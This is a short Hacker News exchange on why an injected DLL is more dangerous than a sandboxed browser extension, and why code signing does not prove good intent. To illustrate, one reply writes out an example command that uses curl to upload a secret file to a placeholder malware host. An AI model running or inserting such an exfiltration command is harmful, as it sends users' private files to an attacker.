Hacker News

yjftsjthsd-h 10/11/2024

But that's not a difference, is it? Can't Windows enforce that DLLs have to be signed just like extensions?


Replies

tredre3 10/11/2024

Injecting a DLL in the browser implies code running with the browser's permissions, which means the DLL will be able to access everything on your system. For example `system("curl https://malware.com -F@/etc/secret-file")` will be possible. Another example is that it could also see all your saved passwords.

A JavaScript extension cannot do that. It is sandboxed and is bound to a permission system limiting what it can do on top of that.

Signing a DLL only proves that the author is who he says he is. Not that his intentions are good. Same for browser extensions.

So it's best to limit what the extension can do to begin with.